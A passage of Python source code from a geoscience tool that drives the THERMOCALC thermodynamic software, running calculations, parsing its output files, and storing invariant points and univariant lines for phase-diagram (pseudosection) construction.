"""pathlib.Path: Path to THERMOCALC prefs file."""
return self.workdir.joinpath('tc-prefs.txt')
def read_prefsfile(self):
with self.prefsfile.open('r', encoding=self.TCenc) as f:
r = f.read()
return r
@property
def tcversion(self):
"""str: Version identification of THERMCALC executable."""
return self.tcout.split('\n')[0]
@property
def tcnewversion(self):
"""bool: False for THERMOCALC older than 3.5."""
return not float(self.tcversion.split()[1]) < 3.5
@property
def datasetfile(self):
"""pathlib.Path: Path to dataset file."""
return self.workdir.joinpath(self.dataset.split(' produced')[0])
@property
def dataset(self):
"""str: Version identification of thermodynamic dataset in use."""
return self.tcout.split('using ')[1].split('\n')[0]
def parse_logfile(self, **kwargs):
"""Parser for THERMOCALC output.
It parses the outputs of THERMOCALC after calculation.
Args:
tx (bool): True for T-X and P-X calculations. Default False.
output (str): When not None, used as content of logfile. Default None.
resic (str): When not None, used as content of icfile. Default None.
Returns:
status (str): Result of parsing. 'ok', 'nir' (nothing in range) or 'bombed'.
results (TCResultSet): Results of TC calculation.
output (str): Full nonparsed THERMOCALC output.
Example:
Parse output after univariant line calculation in P-T pseudosection::
>>> tc = TCAPI('pat/to/dir')
>>> status, result, output = tc.parse_logfile()
"""
if self.tcnewversion:
return self.parse_logfile_new(**kwargs)
else:
return self.parse_logfile_old(**kwargs)
def parse_logfile_new(self, **kwargs):
output = kwargs.get('output', None)
resic = kwargs.get('resic', None)
try:
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read().split('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n')[1]
lines = [ln for ln in output.splitlines() if ln != '']
results = None
do_parse = True
if resic is None:
if not self.icfile.exists():
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
status = 'nir'
do_parse = False
else:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
if do_parse:
lines = [ln for ln in output.splitlines() if ln != '']
# parse ptguesses
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith('------------------------------------------------------------')]
bstarts.append(len(lines))
ptguesses = []
corrects = []
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
if block[2].startswith('#'):
corrects.append(False)
else:
corrects.append(True)
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguesses.append(block[gixs:gixe])
# parse icfile
blocks = resic.split('\n===========================================================\n\n')[1:]
# done
if len(blocks) > 0:
rlist = [TCResult.from_block(block, ptguess) for block, ptguess, correct in zip(blocks, ptguesses, corrects) if correct]
if len(rlist) > 0:
status = 'ok'
results = TCResultSet(rlist)
else:
status = 'nir'
else:
status = 'nir'
return status, results, output
except Exception:
return 'bombed', None, None
def parse_logfile_new_backup(self, **kwargs):
output = kwargs.get('output', None)
resic = kwargs.get('resic', None)
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
lines = [ln for ln in output.splitlines() if ln != '']
results = None
do_parse = True
if resic is None:
if not self.icfile.exists():
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
status = 'nir'
do_parse = False
else:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
if do_parse:
lines = [ln for ln in output.splitlines() if ln != '']
# parse ptguesses
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith('--------------------------------------------------------------------')]
bstarts.append(len(lines))
ptguesses = []
corrects = []
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
if block[2].startswith('#'):
corrects.append(False)
else:
corrects.append(True)
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguesses.append(block[gixs:gixe])
# parse icfile
blocks = resic.split('\n===========================================================\n\n')[1:]
# done
if len(blocks) > 0:
rlist = [TCResult.from_block(block, ptguess) for block, ptguess, correct in zip(blocks, ptguesses, corrects) if correct]
if len(rlist) > 0:
status = 'ok'
results = TCResultSet(rlist)
else:
status = 'nir'
else:
status = 'nir'
return status, results, output
def parse_logfile_old(self, **kwargs):
# res is list of dicts with data and ptguess keys
# data is dict with keys of phases and each contain dict of values
# res[0]['data']['g']['mode']
# res[0]['data']['g']['z']
# res[0]['data']['g']['MnO']
output = kwargs.get('output', None)
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
lines = [''.join([c for c in ln if ord(c) < 128]) for ln in output.splitlines() if ln != '']
pts = []
res = []
variance = -1
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
for ln in lines:
if 'variance of required equilibrium' in ln:
variance = int(ln[ln.index('(') + 1:ln.index('?')])
break
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith(' P(kbar)')]
bstarts.append(len(lines))
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
pts.append([float(n) for n in block[1].split()[:2]])
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguess = block[gixs:gixe]
data = {}
rbix = [ix for ix, ln in enumerate(block) if ln.startswith('rbi yes')][0]
phases = block[rbix - 1].split()[1:]
for phase, val in zip(phases, block[rbix].split()[2:]):
data[phase] = dict(mode=float(val))
for ix in xyz:
lbl = block[ix].split()[1]
phase, comp = lbl[lbl.find('(') + 1:lbl.find(')')], lbl[:lbl.find('(')]
if phase not in data:
raise Exception('Check model {} in your ax file. Commonly liq coded as L for starting guesses.'.format(phase))
data[phase][comp] = float(block[ix].split()[2])
rbiox = block[rbix + 1].split()[2:]
for delta in range(len(phases)):
rbi = {c: float(v) for c, v in zip(rbiox, block[rbix + 2 + delta].split()[2:-2])}
rbi['H2O'] = float(block[rbix + 2 + delta].split()[1])
# data[phases[delta]]['rbi'] = comp
data[phases[delta]].update(rbi)
res.append(dict(data=data, ptguess=ptguess))
if res:
status = 'ok'
pp, TT = np.array(pts).T
results = TCResultSet([TCResult(T, p, variance=variance, step=0.0, data=r['data'], ptguess=r['ptguess']) for (r, p, T) in zip(res, pp, TT)])
else:
status = 'nir'
results = None
return status, results, output
def parse_dogmin_old(self):
"""Dogmin parser."""
try:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
res = output.split('##########################################################\n')[-1]
except Exception:
res = None
resic = None
return res, resic
def parse_dogmin(self):
"""Dogmin parser."""
try:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
except Exception:
output = None
resic = None
return output, resic
def update_scriptfile(self, **kwargs):
"""Method to update scriptfile.
This method is used to programatically edit scriptfile.
Kwargs:
calcs: List of lines defining fully hands-off calculations. Default None.
get_old_calcs: When True method returns existing calcs lines
before possible modification. Default False.
guesses: List of lines defining ptguesses. If None guesses
are not modified. Default None.
get_old_guesses: When True method returns existing ptguess lines
before possible modification. Default False.
bulk: List of lines defining bulk composition. Default None.
xsteps: Number of compositional steps between two bulks.
Default 20.
"""
calcs = kwargs.get('calcs', None)
get_old_calcs = kwargs.get('get_old_calcs', False)
guesses = kwargs.get('guesses', None)
get_old_guesses = kwargs.get('get_old_guesses', False)
bulk = kwargs.get('bulk', None)
xsteps = kwargs.get('xsteps', None)
with self.scriptfile.open('r', encoding=self.TCenc) as f:
scf = f.read()
changed = False
scf_1, rem = scf.split('%{PSBCALC-BEGIN}')
old, scf_2 = rem.split('%{PSBCALC-END}')
old_calcs = old.strip().splitlines()
if calcs is not None:
scf = scf_1 + '%{PSBCALC-BEGIN}\n' + '\n'.join(calcs) + '\n%{PSBCALC-END}' + scf_2
changed = True
scf_1, rem = scf.split('%{PSBGUESS-BEGIN}')
old, scf_2 = rem.split('%{PSBGUESS-END}')
old_guesses = old.strip().splitlines()
if guesses is not None:
scf = scf_1 + '%{PSBGUESS-BEGIN}\n' + '\n'.join(guesses) + '\n%{PSBGUESS-END}' + scf_2
changed = True
if bulk is not None:
scf_1, rem = scf.split('%{PSBBULK-BEGIN}')
old, scf_2 = rem.split('%{PSBBULK-END}')
bulk_lines = []
if len(bulk) == 2:
bulk_lines.append('bulk {}'.format(' '.join(bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(bulk[1])))
else:
bulk_lines.append('bulk {}'.format(' '.join(bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(bulk[1])))
bulk_lines.append('bulk {} {}'.format(' '.join(bulk[2]), xsteps))
scf = scf_1 + '%{PSBBULK-BEGIN}\n' + '\n'.join(bulk_lines) + '\n%{PSBBULK-END}' + scf_2
changed = True
if xsteps is not None:
bulk_lines = []
scf_1, rem = scf.split('%{PSBBULK-BEGIN}')
old, scf_2 = rem.split('%{PSBBULK-END}')
if len(self.bulk) == 3:
bulk_lines.append('bulk {}'.format(' '.join(self.bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(self.bulk[1])))
bulk_lines.append('bulk {} {}'.format(' '.join(self.bulk[2]), xsteps))
scf = scf_1 + '%{PSBBULK-BEGIN}\n' + '\n'.join(bulk_lines) + '\n%{PSBBULK-END}' + scf_2
changed = True
if changed:
with self.scriptfile.open('w', encoding=self.TCenc) as f:
f.write(scf)
if get_old_calcs and get_old_guesses:
return old_calcs, old_guesses
elif get_old_calcs:
return old_calcs
elif get_old_guesses:
return old_guesses
else:
return None
def interpolate_bulk(self, x):
if len(self.bulk) == 2:
new_bulk = []
try:
_ = (e for e in x)
except TypeError:
b1 = np.array([float(v) for v in self.bulk[0]])
b2 = np.array([float(v) for v in self.bulk[1]])
db = b2 - b1
bi = b1 + x * db
new_bulk.append(['{:g}'.format(v) for v in bi])
else:
for x_val in x:
b1 = np.array([float(v) for v in self.bulk[0]])
b2 = np.array([float(v) for v in self.bulk[1]])
db = b2 - b1
bi = b1 + x_val * db
new_bulk.append(['{:g}'.format(v) for v in bi])
else:
new_bulk = self.bulk[0]
return new_bulk
def calc_t(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find univariant line using Calc T at P strategy.
Args:
phases (set): Set of present phases
out (set): Set of single zero mode phase
prange (tuple): Temperature range for calculation
trange (tuple): Pressure range for calculation
steps (int): Number of steps
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
steps = kwargs.get('steps', 50)
step = (prange[1] - prange[0]) / steps
calcs = ['calcP {:g} {:g} {:g}'.format(*prange, step),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
def calc_p(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find univariant line using Calc P at T strategy.
Args:
phases (set): Set of present phases
out (set): Set of single zero mode phase
prange (tuple): Temperature range for calculation
trange (tuple): Pressure range for calculation
steps (int): Number of steps
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
steps = kwargs.get('steps', 50)
step = (trange[1] - trange[0]) / steps
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g} {:g}'.format(*trange, step),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
def calc_pt(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find invariant point.
Args:
phases (set): Set of present phases
out (set): Set of two zero mode phases
prange (tuple): Temperature range for calculation
trange (tuple): Pressure range for calculation
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
def calc_tx(self, phases, out, **kwargs):
"""Method to run THERMOCALC for T-X pseudosection calculations.
Args:
phases (set): Set of present phases
out (set): Set of zero mode phases
prange (tuple): Temperature range for calculation
trange (tuple): Pressure range for calculation
xvals (tuple): range for X variable
steps (int): Number of steps
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
xvals = kwargs.get('xvals', (0, 1))
steps = kwargs.get('steps', 20)
step = (prange[1] - prange[0]) / steps
if prange[0] == prange[1]:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
else:
calcs = ['calcP {:g} {:g} {:g}'.format(*prange, step),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
self.update_scriptfile(calcs=calcs, xsteps=steps)
tcout = self.runtc()
return tcout, calcs
def calc_px(self, phases, out, **kwargs):
"""Method to run THERMOCALC for p-X pseudosection calculations.
Args:
phases (set): Set of present phases
out (set): Set of zero mode phases
prange (tuple): Temperature range for calculation
trange (tuple): Pressure range for calculation
xvals (tuple): range for X variable
steps (int): Number of steps
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
xvals = kwargs.get('xvals', (0, 1))
steps = kwargs.get('steps', 20)
step = (trange[1] - trange[0]) / steps
if trange[0] == trange[1]:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
else:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g} {:g}'.format(*trange, step),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
self.update_scriptfile(calcs=calcs, xsteps=steps)
tcout = self.runtc()
return tcout, calcs
def calc_assemblage(self, phases, p, t, onebulk=None):
"""Method to run THERMOCALC to calculate compositions of stable assemblage.
Args:
phases (set): Set of present phases
p (float): Temperature for calculation
t (float): Pressure for calculation
Returns:
tuple: (tcout, ans) standard output and input for THERMOCALC run.
Input ans could be used to reproduce calculation.
"""
calcs = ['calcP {}'.format(p),
'calcT {}'.format(t),
'with {}'.format(' '.join(phases - self.excess))]
if onebulk is not None:
calcs.append('onebulk {}'.format(onebulk))
self.update_scriptfile(calcs=calcs)
tcout = self.runtc('\nkill\n\n')
return tcout, calcs
def dogmin(self, phases, p, t, variance, doglevel=1, onebulk=None):
"""Run THERMOCALC dogmin session.
Args:
variance (int): Maximum variance to be considered
Returns:
str: THERMOCALC standard output
"""
calcs = ['calcP {}'.format(p),
'calcT {}'.format(t),
'dogmin yes {}'.format(doglevel),
'with {}'.format(' '.join(phases - self.excess)),
'maxvar {}'.format(variance)]
if onebulk is not None:
calcs.append('onebulk {}'.format(onebulk))
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
tcout = self.runtc('\nkill\n\n')
self.update_scriptfile(calcs=old_calcs)
return tcout
def calc_variance(self, phases):
"""Get variance of assemblage.
Args:
phases (set): Set of present phases
Returns:
int: variance
"""
variance = None
calcs = ['calcP {} {}'.format(*self.prange),
'calcT {} {}'.format(*self.trange),
'with {}'.format(' '.join(phases - self.excess)),
'acceptvar no']
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
tcout = self.runtc('kill\n\n')
self.update_scriptfile(calcs=old_calcs)
for ln in tcout.splitlines():
if 'variance of required equilibrium' in ln:
variance = int(ln[ln.index('(') + 1:ln.index('?')])
break
return variance
def runtc(self, instr='kill\n\n'):
"""Low-level method to actually run THERMOCALC.
Args:
instr (str): String to be passed to standard input for session.
Returns:
str: THERMOCALC standard output
"""
if sys.platform.startswith('win'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = 1
startupinfo.wShowWindow = 0
else:
startupinfo = None
p = subprocess.Popen(str(self.tcexe), cwd=str(self.workdir), startupinfo=startupinfo, **popen_kw)
output, err = p.communicate(input=instr.encode(self.TCenc))
if err is not None:
print(err.decode('utf-8'))
sys.stdout.flush()
return output.decode(self.TCenc)
def rundr(self):
"""Method to run drawpd."""
if self.drexe:
instr = self.name + '\n'
if sys.platform.startswith('win'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = 1
startupinfo.wShowWindow = 0
else:
startupinfo = None
p = subprocess.Popen(str(self.drexe), cwd=str(self.workdir), startupinfo=startupinfo, **popen_kw)
p.communicate(input=instr.encode(self.TCenc))
sys.stdout.flush()
return True
else:
print('No drawpd executable identified in working directory.')
return False
class TCResult():
def __init__(self, T, p, variance=0, c=0, data={}, ptguess=['']):
self.data = data
self.ptguess = ptguess
self.T = T
self.p = p
self.variance = variance
self.c = c
@classmethod
def from_block(cls, block, ptguess):
info, ax, sf, bulk, rbi, mode, factor, td, sys, *mems, pems = block.split('\n\n')
if 'var = 2; seen' in info:
# no step in bulk
info, ax, sf, rbi, mode, factor, td, sys, *mems, pems = block.split('\n\n')
bulk = '\n'.join(rbi.split('\n')[:3])
rbi = '\n'.join(rbi.split('\n')[3:])
# heading
data = {phase: {} for phase in info.split('{')[0].split()}
p, T = (float(v.strip()) for v in info.split('{')[1].split('}')[0].split(','))
# var or ovar?
variance = int(info.split('var = ')[1].split(' ')[0].replace(';', ''))
# a-x variables
for head, vals in zip(ax.split('\n')[::2], ax.split('\n')[1::2]):
phase, *names = head.split()
data[phase].update({name.replace('({})'.format(phase), ''): float(val) for name, val in zip(names, vals.split())})
# site fractions
for head, vals in zip(sf.split('\n')[1::2], sf.split('\n')[2::2]): # skip site fractions row
phase, *names = head.split()
data[phase].update({name: float(val) for name, val in zip(names, vals.split())})
# bulk composition
bulk_vals = {}
oxhead, vals = bulk.split('\n')[1:] # skip oxide compositions row
for ox, val in zip(oxhead.split(), vals.split()[1:]):
bulk_vals[ox] = float(val)
data['bulk'] = bulk_vals
# x for TX and pX
if 'step' in vals:
c = float(vals.split('step')[1].split(', x =')[1])
else:
c = 0
# rbi
for row in rbi.split('\n'):
phase, *vals = row.split()
data[phase].update({ox: float(val) for ox, val in zip(oxhead.split(), vals)})
# modes (zero mode is empty field in tc350 !!!)
head, vals = mode.split('\n')
phases = head.split()[1:]
# fixed width parsing !!!
valsf = [float(vals[6:][12 * i:12 * (i + 1)].strip()) if vals[6:][12 * i:12 * (i + 1)].strip() != '' else 0.0 for i in range(len(phases))]
for phase, val in zip(phases, valsf):
data[phase].update({'mode': float(val)})
# factors
head, vals = factor.split('\n')
phases = head.split()[1:]
valsf = [float(vals[6:][12 * i:12 * (i + 1)].strip()) if vals[6:][12 * i:12 * (i + 1)].strip() != '' else 0.0 for i in range(len(phases))]
for phase, val in zip(phases, valsf):
data[phase].update({'factor': float(val)})
# thermodynamic state
head, *rows = td.split('\n')
for row in rows:
phase, *vals = row.split()
data[phase].update({name: float(val) for name, val in zip(head.split(), vals)})
# bulk thermodynamics
sys = {}
for name, val in zip(head.split(), row.split()[1:]):
sys[name] = float(val)
data['sys'] = sys
# model end-members
if len(mems) > 0:
_, mem0 = mems[0].split('\n', maxsplit=1)
head = ['ideal', 'gamma', 'activity', 'prop', 'mu', 'RTlna']
mems[0] = mem0
for mem in mems:
ems = mem.split('\n')
phase, ems0 = ems[0].split(maxsplit=1)
ems[0] = ems0
for row in ems:
em, *vals = row.split()
phase_em = '{}({})'.format(phase, em)
data[phase_em] = {name: float(val) for name, val in zip(head, vals)}
# pure end-members
for row in pems.split('\n')[:-1]:
pem, val = row.split()
data[pem].update({'mu': float(val)})
# Finally
return cls(T, p, variance=variance, c=c, data=data, ptguess=ptguess)
def __repr__(self):
return 'p:{:g} T:{:g} V:{} c:{:g}, Phases: {}'.format(self.p, self.T, self.variance, self.c, ' '.join(self.phases))
def __getitem__(self, key):
if isinstance(key, str):
if key not in self.phases:
raise IndexError('The index ({}) do not exists.'.format(key))
return self.data[key]
else:
raise TypeError('Invalid argument type.')
@property
def phases(self):
return set(self.data.keys())
def rename_phase(self, old, new):
self.data[new] = self.data.pop(old)
for ix, ln in enumerate(self.ptguess):
self.ptguess[ix] = ln.replace('({})'.format(old), '({})'.format(new))
class TCResultSet:
def __init__(self, results):
self.results = results
def __repr__(self):
return '{} results'.format(len(self.results))
def __len__(self):
return len(self.results)
def __getitem__(self, key):
if isinstance(key, slice):
# Get the start, stop, and step from the slice
return TCResultSet(self.results[key])
elif isinstance(key, int):
if key < 0: # Handle negative indices
key += len(self.results)
if key < 0 or key >= len(self.results):
raise IndexError('The index ({}) is out of range.'.format(key))
return self.results[key]
elif isinstance(key, list):
return TCResultSet([self.results[ix] for ix in key])
else:
raise TypeError('Invalid argument type.')
@property
def x(self):
return np.array([res.T for res in self.results])
@property
def y(self):
return np.array([res.p for res in self.results])
@property
def variance(self):
return self.results[0].variance
@property
def c(self):
return np.array([res.c for res in self.results])
@property
def phases(self):
return self.results[0].phases
def ptguess(self, ix):
try:
return self.results[ix].ptguess
except Exception:
return None
def rename_phase(self, old, new):
for r in self.results:
r.rename_phase(old, new)
def insert(self, ix, result):
self.results.insert(ix, result)
class Dogmin:
def __init__(self, **kwargs):
assert 'output' in kwargs, 'Dogmin output must be provided'
assert 'resic' in kwargs, 'ic file content must be provided'
self.id = kwargs.get('id', 0)
self.output = kwargs.get('output').split('##########################################################\n')[-1]
self.resic = kwargs.get('resic')
self.phases = set(self.output.split('assemblage')[1].split('\n')[0].split())
self.x = kwargs.get('x', None)
self.y = kwargs.get('y', None)
@property
def out(self):
return set()
def label(self, excess={}):
"""str: full label with space delimeted phases."""
return ' '.join(sorted(list(self.phases.difference(excess))))
def annotation(self, show_out=False, excess={}):
"""str: String representation of ID with possible zermo mode phase."""
if show_out:
return self.label(excess=excess)
else:
return '{:d}'.format(self.id)
def ptguess(self):
block = [ln for ln in self.output.splitlines() if ln != '']
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 1
gixe = xyz[-1] + 2
return block[gixs:gixe]
class PseudoBase:
"""Base class with common methods for InvPoint and UniLine.
"""
def label(self, excess={}):
"""str: full label with space delimeted phases - zero mode phase."""
phases_lbl = ' '.join(sorted(list(self.phases.difference(excess))))
out_lbl = ' '.join(sorted(list(self.out)))
return '{} - {}'.format(phases_lbl, out_lbl)
def annotation(self, show_out=False):
"""str: String representation of ID with possible zermo mode phase."""
if show_out:
return '{:d} {}'.format(self.id, ' '.join(self.out))
else:
return '{:d}'.format(self.id)
def ptguess(self, **kwargs):
"""list: Get stored ptguesses.
InvPoint has just single ptguess, but for UniLine idx need to be
specified. If omitted, the middle point from calculated ones is used.
Args:
idx (int): index which guesses to get.
"""
idx = kwargs.get('idx', self.midix)
return self.results[idx].ptguess
def datakeys(self, phase=None):
"""list: Get list of variables for phase.
Args:
phase (str): name of phase
"""
if phase is None:
return list(self.results[self.midix].data.keys())
else:
return list(self.results[self.midix].data[phase].keys())
class InvPoint(PseudoBase):
"""Class to store invariant point
Attributes:
id (int): Invariant point identification
phases (set): set of present phases
out (set): set of zero mode phases
cmd (str): THERMOCALC standard input to calculate this point
variance (int): variance
x (numpy.array): Array of x coordinates
(even if only one, it is stored as array)
y (numpy.array): Array of x coordinates
(even if only one, it is stored as array)
results (list): List of results dicts with data and ptgues keys.
output (str): Full THERMOCALC output
manual (bool): True when inavariant point is user-defined and not
calculated
"""
def __init__(self, **kwargs):
assert 'phases' in kwargs, 'Set of phases must be provided'
assert 'out' in kwargs, 'Set of zero phase must be provided'
self.id = kwargs.get('id', 0)
self.phases = kwargs.get('phases')
self.out = kwargs.get('out')
self.cmd = kwargs.get('cmd', '')
self.variance = kwargs.get('variance', 0)
self.x = kwargs.get('x', [])
self.y = kwargs.get('y', [])
self.results = kwargs.get('results', None)
self.output = kwargs.get('output', 'User-defined')
self.manual = kwargs.get('manual', False)
def __repr__(self):
return 'Inv: {}'.format(self.label())
@property
def midix(self):
return 0
@property
def _x(self):
"""X coordinate as float"""
return self.x[0]
@property
def _y(self):
"""Y coordinate as float"""
return self.y[0]
def shape(self):
"""Return shapely Point representing invariant point."""
return Point(self._x, self._y)
def all_unilines(self):
"""Return four tuples (phases, out) indicating possible four
univariant lines passing trough this invariant point"""
a, b = self.out
aset, bset = set([a]), set([b])
aphases, bphases = self.phases.difference(aset), self.phases.difference(bset)
# Check for polymorphs
fix = False
for poly in polymorphs:
if poly.issubset(self.phases):
fix = True
break
if fix and (poly != self.out): # on boundary
yespoly = poly.intersection(self.out)
nopoly = self.out.difference(yespoly)
aphases = self.phases.difference(yespoly)
bphases = self.phases.difference(poly.difference(self.out))
return((aphases, nopoly),
(bphases, nopoly),
(self.phases, yespoly),
(self.phases.difference(nopoly), yespoly))
else:
return((self.phases, aset),
(self.phases, bset),
(bphases, aset),
(aphases, bset))
class UniLine(PseudoBase):
"""Class to store univariant line
Attributes:
id (int): Invariant point identification
phases (set): set of present phases
out (set): set of zero mode phase
cmd (str): THERMOCALC standard input to calculate this point
variance (int): variance
_x (numpy.array): Array of x coordinates (all calculated)
_y (numpy.array): Array of x coordinates (all calculated)
results (list): List of results dicts with data and ptgues keys.
output (str): Full THERMOCALC output
manual (bool): True when inavariant point is user-defined and not
calculated
begin (int): id of invariant point defining begining of the line.
0 for no begin
end (int): id of invariant point defining end of the line.
0 for no end
used (slice): slice indicating which point on calculated line are
between begin and end
"""
def __init__(self, **kwargs):
assert 'phases' in kwargs, 'Set of phases must be provided'
assert 'out' in kwargs, 'Set of zero phase must be provided'
self.id = kwargs.get('id', 0)
self.phases = kwargs.get('phases')
self.out = kwargs.get('out')
self.cmd = kwargs.get('cmd', '')
self.variance = kwargs.get('variance', 0)
self._x = kwargs.get('x', np.array([]))
self._y = kwargs.get('y', np.array([]))
self.results = kwargs.get('results', None)
self.output = kwargs.get('output', 'User-defined')
self.manual = kwargs.get('manual', False)
self.begin = kwargs.get('begin', 0)
self.end = kwargs.get('end', 0)
self.used = slice(0, len(self._x))
self.x = self._x.copy()
self.y = self._y.copy()
def __repr__(self):
return 'Uni: {}'.format(self.label())
@property
def midix(self):
return int((self.used.start + self.used.stop) // 2)
@property
def connected(self):
return 2 - [self.begin, self.end].count(0)
def _shape(self, ratio=None, tolerance=None):
"""Return shapely LineString representing univariant line.
This method is using all calculated points.
Args:
ratio: y-coordinate multiplier to scale coordinates. Default None
tolerance: tolerance x coordinates. Simplified object will be within
the tolerance distance of the original geometry. Default None
"""
if ratio is None:
return LineString(np.array([self._x, self._y]).T)
else:
if tolerance is None:
return LineString(np.array([self._x, self._y]).T)
else:
ln = LineString(np.array([self._x, ratio * self._y]).T).simplify(tolerance)
x, y = np.array(ln.coords).T
return LineString(np.array([x, y / ratio]).T)
def shape(self, ratio=None, tolerance=None):
"""Return shapely LineString representing univariant line.
This method is using trimmed points.
Args:
ratio: y-coordinate multiplier to scale coordinates. Default None
tolerance: tolerance x coordinates. Simplified object will be within
the tolerance distance of the original geometry. Default None
"""
if ratio is None:
return LineString(np.array([self.x, self.y]).T)
else:
if tolerance is None:
return LineString(np.array([self.x, self.y]).T)
else:
ln = LineString(np.array([self.x, ratio * self.y]).T).simplify(tolerance)
x, y = np.array(ln.coords).T
return LineString(np.array([x, y / ratio]).T)
def contains_inv(self, ip):
"""Check whether invariant point theoretically belong to univariant line.
Args:
ip (InvPoint): Invariant point
Returns:
bool: True for yes, False for no. Note that metastability is not checked.
"""
def checkme(uphases, uout, iphases, iout):
a, b = iout
aset, bset = set([a]), set([b])
aphases, bphases = iphases.difference(aset), iphases.difference(bset)
candidate = False
if iphases == uphases and len(iout.difference(uout)) == 1:
candidate = True
if bphases == uphases and aset == uout:
candidate = True
if aphases == uphases and bset == uout:
candidate = True
return candidate
# Check for polymorphs
fixi, fixu = False, False
for poly in polymorphs:
if poly.issubset(ip.phases) and (poly != ip.out) and (not ip.out.isdisjoint(poly)):
fixi = True
if poly.issubset(self.phases) and not self.out.isdisjoint(poly):
fixu = True
break
# check invs
candidate = checkme(self.phases, self.out, ip.phases, ip.out)
if fixi and not candidate:
candidate = checkme(self.phases, self.out, ip.phases, ip.out.difference(poly).union(poly.difference(ip.out)))
if fixu and not candidate:
candidate = checkme(self.phases, poly.difference(self.out), ip.phases, ip.out)
return candidate
def get_label_point(self):
"""Returns coordinate tuple of labeling point for univariant line."""
if len(self.x) > 1:
dx = np.diff(self.x)
dy = np.diff(self.y)
d = np.sqrt(dx**2 + dy**2)
sd = np.sum(d)
if sd > 0:
cl = np.append([0], np.cumsum(d))
ix = np.interp(sd / 2, cl, range(len(cl)))
cix = int(ix)
